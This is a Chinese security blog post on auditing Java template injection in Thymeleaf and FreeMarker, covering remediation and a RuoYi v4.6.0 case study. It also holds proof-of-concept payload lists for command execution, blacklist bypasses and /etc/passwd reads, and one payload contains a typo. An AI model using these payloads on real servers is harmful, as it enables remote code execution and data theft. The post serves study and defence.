
<!DOCTYPE html><html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1" theme-name="Stellar" theme-version="1.33.1">
  
  
  <meta name="generator" content="Hexo 6.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  <title>java模板注入漏洞审计学习 - Sherlock</title>

  
    <meta name="description" content="Thymeleaf模板注入漏洞简介Thymeleaf服务器端模板注入(Server-Side Template Injection, SSTI)漏洞，通常发生在应用程序不安全地使用用户提供的动态输入来构建或解析Thymeleaf模板时。简单来说，就是当你的应用程序将用户可控的数据直接作为Thymeleaf模板的一部分进行渲染时，攻击者可以通过精心构造恶意的Thymeleaf表达式作为输入发送给服务">
<meta property="og:type" content="article">
<meta property="og:title" content="java模板注入漏洞审计学习">
<meta property="og:url" content="http://example.com/2026/01/12/java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AE%A1%E8%AE%A1%E5%AD%A6%E4%B9%A0/">
<meta property="og:site_name" content="Sherlock">
<meta property="og:description" content="Thymeleaf模板注入漏洞简介Thymeleaf服务器端模板注入(Server-Side Template Injection, SSTI)漏洞，通常发生在应用程序不安全地使用用户提供的动态输入来构建或解析Thymeleaf模板时。简单来说，就是当你的应用程序将用户可控的数据直接作为Thymeleaf模板的一部分进行渲染时，攻击者可以通过精心构造恶意的Thymeleaf表达式作为输入发送给服务">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/themes/hexo-theme-stellar/1.jpg">
<meta property="article:published_time" content="2026-01-12T02:44:20.000Z">
<meta property="article:modified_time" content="2026-01-13T09:42:51.306Z">
<meta property="article:author" content="Sherlock">
<meta property="article:tag" content="智商不够,勤勉来凑;眼神不太好">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/themes/hexo-theme-stellar/1.jpg">
  
  
  
  <meta name="keywords" content="智商不够,勤勉来凑;眼神不太好">

  <!-- feed -->
  

  <link rel="stylesheet" href="/css/main.css?v=1.33.1">


  

  

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Sherlock","sameAs":[],"image":"/themes/hexo-theme-stellar/1.jpg"},"dateCreated":"2026-01-12T10:44:20+08:00","dateModified":"2026-01-13T17:42:51+08:00","datePublished":"2026-01-12T10:44:20+08:00","description":"","headline":"java模板注入漏洞审计学习","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2026/01/12/java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AE%A1%E8%AE%A1%E5%AD%A6%E4%B9%A0/"},"publisher":{"@type":"Organization","name":"Sherlock","sameAs":[],"image":"/themes/hexo-theme-stellar/1.jpg","logo":{"@type":"ImageObject","url":"/themes/hexo-theme-stellar/1.jpg"}},"url":"http://example.com/2026/01/12/java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AE%A1%E8%AE%A1%E5%AD%A6%E4%B9%A0/","image":[]}</script>
  
</head>
<body>

<div class="l_body content" id="start" layout="post" type="tech" ><aside class="l_left"><div class="sidebg"></div><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="/themes/hexo-theme-stellar/1.jpg" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main">Sherlock</div><div class="sub cap">言念君子，温其如玉</div></a></div></header>

<div class="nav-area">

<nav class="menu dis-select"><a class="nav-item active" title="博客" href="/" style="color:#1BCDFC"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" fill-rule="evenodd" d="M5.879 2.879C5 3.757 5 5.172 5 8v8c0 2.828 0 4.243.879 5.121C6.757 22 8.172 22 11 22h2c2.828 0 4.243 0 5.121-.879C19 20.243 19 18.828 19 16V8c0-2.828 0-4.243-.879-5.121C17.243 2 15.828 2 13 2h-2c-2.828 0-4.243 0-5.121.879M8.25 17a.75.75 0 0 1 .75-.75h3a.75.75 0 0 1 0 1.5H9a.75.75 0 0 1-.75-.75M9 12.25a.75.75 0 0 0 0 1.5h6a.75.75 0 0 0 0-1.5zM8.25 9A.75.75 0 0 1 9 8.25h6a.75.75 0 0 1 0 1.5H9A.75.75 0 0 1 8.25 9" clip-rule="evenodd"/><path fill="currentColor" d="M5.235 4.058C5 4.941 5 6.177 5 8v8c0 1.823 0 3.058.235 3.942L5 19.924c-.975-.096-1.631-.313-2.121-.803C2 18.243 2 16.828 2 14v-4c0-2.829 0-4.243.879-5.121c.49-.49 1.146-.707 2.121-.803zm13.53 15.884C19 19.058 19 17.822 19 16V8c0-1.823 0-3.059-.235-3.942l.235.018c.975.096 1.631.313 2.121.803C22 5.757 22 7.17 22 9.999v4c0 2.83 0 4.243-.879 5.122c-.49.49-1.146.707-2.121.803z" opacity=".5"/></svg></a><a class="nav-item" title="社交" href="/friends/" style="color:#F44336"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="m13.629 20.472l-.542.916c-.483.816-1.69.816-2.174 0l-.542-.916c-.42-.71-.63-1.066-.968-1.262c-.338-.197-.763-.204-1.613-.219c-1.256-.021-2.043-.098-2.703-.372a5 5 0 0 1-2.706-2.706C2 14.995 2 13.83 2 11.5v-1c0-3.273 0-4.91.737-6.112a5 5 0 0 1 1.65-1.651C5.59 2 7.228 2 10.5 2h3c3.273 0 4.91 0 6.113.737a5 5 0 0 1 1.65 1.65C22 5.59 22 7.228 22 10.5v1c0 2.33 0 3.495-.38 4.413a5 5 0 0 1-2.707 2.706c-.66.274-1.447.35-2.703.372c-.85.015-1.275.022-1.613.219c-.338.196-.548.551-.968 1.262" opacity=".5"/><path fill="currentColor" d="M10.99 14.308c-1.327-.978-3.49-2.84-3.49-4.593c0-2.677 2.475-3.677 4.5-1.609c2.025-2.068 4.5-1.068 4.5 1.609c0 1.752-2.163 3.615-3.49 4.593c-.454.335-.681.502-1.01.502c-.329 0-.556-.167-1.01-.502"/></svg></a></nav>
</div>
<div class="widgets">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="Search"></form><div id="search-result"></div><div class="search-no-result">No Results!</div></div>



<widget class="widget-wrapper recent post-list"><div class="widget-header dis-select"><span class="name">Recent Update</span></div><div class="widget-body fs14"><a class="item title" href="/2026/01/12/java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AE%A1%E8%AE%A1%E5%AD%A6%E4%B9%A0/"><span class="title">java模板注入漏洞审计学习</span></a><a class="item title" href="/2025/06/30/xss%E5%9C%A8%E4%BC%81%E4%B8%9Asrc%E4%B8%AD%E7%9A%84%E6%8C%96%E6%8E%98%E5%A7%BF%E5%8A%BF/"><span class="title">xss在企业src中的挖掘姿势</span></a><a class="item title" href="/2025/12/03/shiro%E5%AE%89%E5%85%A8%E6%A0%A1%E9%AA%8C%E6%B5%81%E7%A8%8B%E9%9B%B6%E5%9F%BA%E7%A1%80%E6%95%99%E5%AD%A6/"><span class="title">shiro安全校验流程零基础教学</span></a><a class="item title" href="/2025/10/30/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7/"><span class="title">java代码审计的一些小技巧</span></a><a class="item title" href="/2025/10/12/Vulnstack%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA-1/"><span class="title">Vulnstack红日靶场(1)</span></a><a class="item title" href="/2025/05/21/java%E5%86%85%E5%AD%98%E9%A9%AC%E4%B9%8Bjava-agent/"><span class="title">java内存马之java-agent</span></a><a class="item title" href="/2025/10/22/%E9%9D%A2%E8%AF%95%E5%B0%8F%E7%BB%93/"><span class="title">面试小结</span></a><a class="item title" href="/2025/02/13/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8Bfastjson/"><span class="title">java反序列化之fastjson</span></a><a class="item title" href="/2023/11/19/sql%E6%B3%A8%E5%85%A5%E5%BF%83%E5%BE%97_max/sql%E6%B3%A8%E5%85%A5%E5%BF%83%E5%BE%97/"><span class="title">sql注入心得</span></a><a class="item title" href="/2025/10/10/java-agent%E4%B8%8ERASP/"><span class="title">java-agent与RASP</span></a></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">Home</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">Blog</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></div>
<div class="flex-row" id="post-meta"><span class="text created">Posted on: <time datetime="2026-01-12T02:44:20.000Z">2026-01-12</time></span><span class="sep updated"></span><span class="text updated">Updated on: <time datetime="2026-01-13T09:42:51.306Z">2026-01-13</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>java模板注入漏洞审计学习</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h1 id="Thymeleaf模板注入漏洞"><a href="#Thymeleaf模板注入漏洞" class="headerlink" title="Thymeleaf模板注入漏洞"></a>Thymeleaf模板注入漏洞</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>Thymeleaf服务器端模板注入(Server-Side Template Injection, SSTI)漏洞，通常发生在应用程序不安全地使用用户提供的动态输入来构建或解析Thymeleaf模板时。<br>简单来说，就是当你的应用程序将用户可控的数据直接作为Thymeleaf模板的一部分进行渲染时，攻击者可以通过精心构造恶意的Thymeleaf表达式作为输入发送给服务器。Thymeleaf引擎在处理这些数据时，会将其误认为是合法的模板指令或表达式，并尝试在服务器端执行这些恶意代码。</p>
<h2 id="攻击原理"><a href="#攻击原理" class="headerlink" title="攻击原理"></a>攻击原理</h2><p>Thymeleaf强大的表达式语言是其核心特性之一，它允许开发者动态地设置模板中的值、执行逻辑、调用方法等。例如，${user.name}会被替换为用户的名字。<br>然而，如果攻击者能够控制这个表达式的内容，他们就可以注入恶意的Java代码，让Thymeleaf引擎在服务器上执行。一个经典的例子就是利用Java的反射机制来执行系统命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;T(java.lang.Runtime).getRuntime().exec(&#x27;calc&#x27;)&#125;</span><br></pre></td></tr></table></figure>

<p>这个表达式的含义是：	</p>
<ul>
<li>T(…)：Thymeleaf表达式中的一个特殊语法，用于引用Java类。</li>
<li>java.lang.Runtime：Java标准库中用于与运行时环境交互的类。</li>
<li>.getRuntime()：获取Runtime类的单例实例。</li>
<li>.exec(‘calc’)：调用Runtime实例的exec方法来执行一个系统命令。在这里，它会尝试启动计算器程序(calc命令在Windows上有效)。</li>
</ul>
<p>如果应用程序没有对用户输入进行严格的验证和过滤，并且将包含此恶意表达式的字符串直接传递给Thymeleaf引擎进行解析，那么calc命令就会在运行应用程序的服务器上被执行。</p>
<h2 id="漏洞版本及修复"><a href="#漏洞版本及修复" class="headerlink" title="漏洞版本及修复"></a>漏洞版本及修复</h2><p>Thymeleaf 3.0.0至3.0.11版本存在这种模板注入漏洞。这些版本在处理一些动态表达式时可能存在缺陷，允许未经授权的代码执行。</p>
<p>针对Thymeleaf SSTI漏洞，可以采取以下修复和防范措施：</p>
<ol>
<li><p><strong>升级Thymeleaf版本</strong></p>
<p>这是最根本的解决方法。Thymeleaf在 <strong>3.0.12</strong> 及以后版本中增加了安全检测逻辑（<code>SpringStandardExpressionUtils</code>），会检查表达式是否包含危险的<code>new</code>关键字或<code>T(...)</code>形式的静态方法调用。虽然高版本可能存在绕过方式（如在<code>T</code>和类名之间插入空格<code>T (Runtime)</code>）</p>
</li>
<li><p><strong>安全的编码实践（治本之策）</strong></p>
<ul>
<li><strong>避免用户输入直接参与视图名拼接</strong>：这是最关键的代码审计和开发原则。</li>
<li>**使用<code>@ResponseBody</code>或<code>@RestController</code>**：如果控制器方法只需返回数据而非视图名称，使用这些注解可以避免Spring进行视图解析。</li>
<li><strong>返回重定向视图</strong>：在返回值前明确加上<code>&quot;redirect:&quot;</code>，这样会由<code>RedirectView</code>处理，而不是Thymeleaf视图解析器。</li>
<li>**方法参数中添加<code>HttpServletResponse</code>**：当方法参数中包含<code>HttpServletResponse</code>时，Spring会认为响应已由应用程序处理，从而跳过视图解析</li>
</ul>
</li>
</ol>
<h2 id="POC及一些的绕过姿势"><a href="#POC及一些的绕过姿势" class="headerlink" title="POC及一些的绕过姿势"></a>POC及一些的绕过姿势</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$&#123;T(java.lang.Runtime).getRuntime().exec(&quot;calc.exe&quot;)&#125;</span><br><span class="line">$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;).getInp</span><br><span class="line">utStream()).next()%7d</span><br><span class="line">__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).ge</span><br><span class="line">tInputStream()).next()%7d__::.x</span><br><span class="line">__$&#123;&#125;__</span><br></pre></td></tr></table></figure>

<p>3.0.15版本绕过可参考：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/2501660">https://cloud.tencent.com/developer/article/2501660</a></p>
<p>Thymeleaf 3.0.15版本中只要检测到<code>&quot;&#123;&quot;</code>就会认为存在表达式内容，随后直接抛出异常停止解析来防范模板注入问题，此类场景用于我们URL PATH、Retruen、Fragment等可控的情况下进行，但是如果我们存在对模板文件进行更改、创建、上传等操作的时候我们还可以精心构造恶意的JAVA代码并将其写入模板中，随后触发执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[[$&#123;T(ch.qos.logback.core.util.OptionHelper).instantiateByClassName(&quot;org.springframework.expression.spel.standard.SpelExpressionParser&quot;,&quot;&quot;.getClass().getSuperclass(),T(ch.qos.logback.core.util.OptionHelper).getClassLoader()).parseExpression(&quot;T(java.lang.String).forName(&#x27;java.lang.Runtime&#x27;).getRuntime().exec(&#x27;calc&#x27;)&quot;).getValue()&#125;]] //拿来绕黑名单</span><br></pre></td></tr></table></figure>

<p>在Thymeleaf 3.0.15版本之后的模板注入主要集中在黑名单的绕过以及寻找可以更改目标文件的位置，例如：编辑、上传等功能点位</p>
<p>在3.0.12版本中的绕过可参考文章文章：<a target="_blank" rel="noopener" href="https://rivers.chaitin.cn/blog/cq950pp0lnechd244ga0">https://rivers.chaitin.cn/blog/cq950pp0lnechd244ga0</a></p>
<h2 id="RuoYi-v4-6-0"><a href="#RuoYi-v4-6-0" class="headerlink" title="RuoYi-v4.6.0"></a>RuoYi-v4.6.0</h2><p>一切的前提肯定要存在themeleaf依赖，该项目依赖版本为3.0.11</p>
<p>对于模板注入的审计步骤：</p>
<p>1、关注是否存在模板文件篡改的问题（偏黑盒）</p>
<p>（1）后端模板文件修改</p>
<p>（2）任意文件上传覆盖模板文件：文件名要可控并且可以实现路径穿越从而进行覆盖</p>
<p>2、关注访问路由解析寻找对于模板文件是否可控（白盒）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">（1）return &quot;home-&quot; + lang;(CN or EN) //正则表达匹配，关键是要有return和+</span><br><span class="line">（2）return &quot;welcome ::&quot; + section; //直接全局搜索::</span><br></pre></td></tr></table></figure>

<p>我们可以查看头像文件上传方法</p>
<img src="../source/imgs/${fiilname}/image-20260112141700318.png" alt="image-20260112141700318" style="zoom: 33%;" />

<p>跟进去发现有限制文件后缀名</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260112141753788.png" alt="image-20260112141753788"></p>
<p>白名单中允许上传html文件</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260112141824154.png" alt="image-20260112141824154"></p>
<p>但是上传后的文件名会进行随机编码，所以无法进行覆盖</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260112142247724.png" alt="image-20260112142247724"></p>
<p>第一种方式行不通，所以我们需要找找第二种方式是否存在，所以先进行全局搜索<code>::</code></p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260112142859819.png" alt="image-20260112142859819"></p>
<p>可以看到符合条件的有四个，我们随便进一个看看具体情况</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260112143030473.png" alt="image-20260112143030473"></p>
<p>也可以看到没有进行任何的过滤处理等等，该路由为post传参<code>fragment=$&#123;T(java.lang.Runtime).getRuntime().exec(&quot;calc.exe&quot;)&#125;</code>，构造请求，可以成功实现注入</p>
<h1 id="FreeMarker模板注入漏洞"><a href="#FreeMarker模板注入漏洞" class="headerlink" title="FreeMarker模板注入漏洞"></a>FreeMarker模板注入漏洞</h1><h2 id="安全配置"><a href="#安全配置" class="headerlink" title="安全配置"></a>安全配置</h2><p>2.3.17版本以后，官方版本提供了三种TemplateClassResolver对类进行解析：<br>1、UNRESTRICTED_RESOLVER：可以通过<code>ClassUtil.forName(className)</code>获取任何类。<br>2、SAFER_RESOLVER：不能加载<code>freemarker.template.utility.JythonRuntime</code>、<code>freemarker.template.utility.Execute</code>、<code>freemarker.template.utility.ObjectConstructor</code>这三个类。<br>3、ALLOWS_NOTHING_RESOLVER：不能解析任何类。可通过<code>freemarker.core.Configurable#setNewBuiltinClassResolver</code>方法设置TemplateClassResolver，从而限制通过new()函数对<code>freemarker.template.utility.JythonRuntime</code>、<code>freemarker.template.utility.Execute</code>、<code>freemarker.template.utility.ObjectConstructor</code>这三个类的解析</p>
<p>实现FreeMaker模板渲染的核心步骤如下所示：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> freemarker.template.Configuration;</span><br><span class="line"><span class="keyword">import</span> freemarker.template.Template;</span><br><span class="line"><span class="keyword">import</span> freemarker.template.TemplateException;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.StringWriter;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">FreeMarkerDemo</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="comment">// 1. 创建并配置FreeMarker核心对象</span></span><br><span class="line">        <span class="type">Configuration</span> <span class="variable">cfg</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Configuration</span>(Configuration.VERSION_2_3_31);</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 设置模板文件所在的目录</span></span><br><span class="line">            cfg.setDirectoryForTemplateLoading(<span class="keyword">new</span> <span class="title class_">java</span>.io.File(<span class="string">&quot;src/main/resources/templates&quot;</span>));</span><br><span class="line">            <span class="comment">// 设置默认字符编码，防止中文乱码</span></span><br><span class="line">            cfg.setDefaultEncoding(<span class="string">&quot;UTF-8&quot;</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 2. 加载具体的模板文件</span></span><br><span class="line">            <span class="type">Template</span> <span class="variable">template</span> <span class="operator">=</span> cfg.getTemplate(<span class="string">&quot;hello.ftl&quot;</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 3. 准备数据模型（通常是一个Map或JavaBean）</span></span><br><span class="line">            Map&lt;String, Object&gt; dataModel = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">            dataModel.put(<span class="string">&quot;name&quot;</span>, <span class="string">&quot;World&quot;</span>);</span><br><span class="line">            dataModel.put(<span class="string">&quot;currentYear&quot;</span>, <span class="number">2026</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 4. 将模板和数据模型结合，渲染输出</span></span><br><span class="line">            <span class="comment">// 使用StringWriter来捕获渲染后的字符串内容</span></span><br><span class="line">            <span class="keyword">try</span> (<span class="type">StringWriter</span> <span class="variable">writer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringWriter</span>()) &#123;</span><br><span class="line">                template.process(dataModel, writer);</span><br><span class="line">                <span class="comment">// 输出渲染结果</span></span><br><span class="line">                System.out.println(writer.toString());</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException | TemplateException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>应的模板文件 <code>hello.ftl</code>（通常放在 <code>src/main/resources/templates/</code>目录下）内容如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;FreeMarker Demo&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;h1&gt;Hello $&#123;name&#125;!&lt;/h1&gt;</span><br><span class="line">    &lt;p&gt;Copyright © $&#123;currentYear&#125;&lt;/p&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>如果想要进行安全配置的话，在上面的java代码中可以添加如下内容：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 禁止解析ObjectConstructor、Execute和JythonRuntime这三个危险类</span></span><br><span class="line">         cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);</span><br><span class="line">         </span><br><span class="line">         <span class="comment">// 2. 禁用API内建函数 - 防止通过?api进行反射攻击</span></span><br><span class="line">         cfg.setAPIBuiltinEnabled(<span class="literal">false</span>);</span><br><span class="line">         </span><br><span class="line">         <span class="comment">// 3. 设置HTML输出格式，启用自动转义</span></span><br><span class="line">         cfg.setOutputFormat(Configuration.HTML_OUTPUT_FORMAT);</span><br></pre></td></tr></table></figure>

<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><h3 id="命令执行POC"><a href="#命令执行POC" class="headerlink" title="命令执行POC"></a>命令执行POC</h3><p>1.利用new内置函数执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign ex=&quot;freemarker.template.utility.Execute&quot;?new()&gt;</span><br><span class="line">$&#123;ex(&quot;whoami&quot;)&#125;</span><br></pre></td></tr></table></figure>

<p><code>&lt;#assign ex=...&gt;</code>：这是FreeMarker的赋值指令</p>
<p>2.利用api内置函数执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign uri=object?api.class.protectionDomain.codeSource.location.toURI()&gt;</span><br><span class="line">//这行代码的目的是获取当前Java类（object）所在的JAR包或类文件的路径URI</span><br><span class="line">&lt;#assign input=object?api.class.getClassLoader().loadClass(&quot;java.lang.Runtime&quot;).getMethod(&quot;getRuntime&quot;).invoke(null).exec(&quot;whoami&quot;)&gt;</span><br><span class="line">$&#123;input?api.waitFor()&#125;</span><br><span class="line">//这行代码只等待进程结束，并没有进一步读取命令输出的具体内容</span><br></pre></td></tr></table></figure>

<p>3.利用ObjectConstructor执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign obj=&quot;freemarker.template.utility.ObjectConstructor&quot;?new()&gt;</span><br><span class="line">&lt;#assign runtime=obj(&quot;java.lang.Runtime&quot;)&gt;</span><br><span class="line">$&#123;runtime.getRuntime().exec(&quot;whoami&quot;)&#125;</span><br></pre></td></tr></table></figure>

<h3 id="文件读取POC"><a href="#文件读取POC" class="headerlink" title="文件读取POC"></a>文件读取POC</h3><p>1.读取任意文件内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign is=object?api.class.getResourceAsStream(&quot;/etc/passwd&quot;)&gt;</span><br><span class="line">&lt;#assign br=object?api.class.forName(&quot;java.io.BufferedReader&quot;)?api.getconstructor(object?api.class.forName(&quot;java.io.InputStreamReader&quot;)).newInstance(is)&gt;</span><br><span class="line">&lt;#list 1..10000 as i&gt;</span><br><span class="line">	&lt;#assign line=br?api.readLine()!&quot;&quot;&gt;</span><br><span class="line">	&lt;#if 1ine?has_content&gt;$&#123;line&#125;&lt;#else&gt;&lt;#break&gt;&lt;/#if&gt;</span><br><span class="line">&lt;/#list&gt;</span><br></pre></td></tr></table></figure>

<p>2.使用FileInputStream读取文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign fis=&quot;java.io.FileInputStream&quot;?new(&quot;/etc/passwd&quot;)&gt;</span><br><span class="line">&lt;#assign isr=&quot;java.io.InputStreamReader&quot;?new(fis)&gt;</span><br><span class="line">&lt;#assign br=&quot;java.io.BufferedReader&quot;?new(isr)&gt;</span><br><span class="line">&lt;#assign line=br.readLine()&gt;</span><br><span class="line">$&#123;line&#125;</span><br></pre></td></tr></table></figure>

<p>3.读取文件并输出全部内容</p>
